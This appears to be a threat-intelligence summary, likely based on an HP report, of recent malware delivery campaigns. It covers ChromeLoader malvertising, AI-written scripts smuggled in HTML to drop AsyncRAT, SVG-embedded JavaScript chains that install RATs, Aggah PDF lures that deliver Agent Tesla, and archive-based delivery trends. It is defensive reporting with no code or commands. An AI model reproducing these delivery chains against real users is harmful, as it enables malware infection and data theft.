Threat actors are increasingly leveraging generative AI to enhance their attack capabilities, as recent campaigns demonstrate the growing sophistication of AI-generated malware, such as the use of VBScript and JavaScript to spread AsyncRAT and the embedding of malicious JavaScript within SVG images.
ChromeLoader campaigns have become more targeted and polished, employing malvertising and MSI files to bypass security measures and infect endpoints, highlighting the accelerating pace of cyberattacks and the need for organizations to adapt their security strategies to counter evolving threats.
It is a malicious browser extension that targets users through fake software installers, signed with valid code signing certificates, and distributed via malvertising campaigns.
Once installed, ChromeLoader monitors and controls the victim’s browsing session, redirecting search queries to attacker-controlled websites for ad fraud, and persists on the infected system through a Registry Run key and starts automatically with the browser.
A novel HTML smuggling attack leveraged generative AI to create a sophisticated infection chain, where the attackers used a password-protected HTML attachment to deliver a VBScript payload that deployed the AsyncRAT remote access trojan.
Surprisingly, the VBScript and JavaScript files were not obfuscated but instead contained clear comments that suggested the use of generative AI in their development, which highlights the increasing accessibility of advanced cyberattacks for threat actors, as AI tools can help them create more sophisticated and effective malware.
The attackers exploited the scripting capabilities of SVG images to distribute malware. By embedding malicious JavaScript within SVG files, they tricked users into downloading a ZIP archive containing a URL file that pointed to a remote SMB share.
This share hosted a shortcut file that, when opened, downloaded a batch file that further distributed various scripts to the user’s local folders, including VBS, CMD, BAT, and PowerShell, were used to install different malware families such as Venom RAT, XWorm, Remcos, and AsyncRAT onto the infected endpoint.
Aggah malware campaign switched from weaponized Office documents to PDF documents, which tricks users into downloading a VBScript, which downloads a PowerShell script.
The PowerShell script disables security features and injects Agent Tesla malware, which steals information and exfiltrates data via Discord. Despite the change in file type, Aggah’s TTPs remain largely the same.
According to HP, archives reclaimed the top spot as the most popular malware delivery method, surpassing executables and scripts. Threat actors exploited a variety of archive formats, with ZIP files being particularly prevalent.
Email remained the primary vector for delivering malware, while web browser downloads and other vectors experienced minor declines. Despite email gateway scanners, a significant portion of malicious emails managed to bypass detection.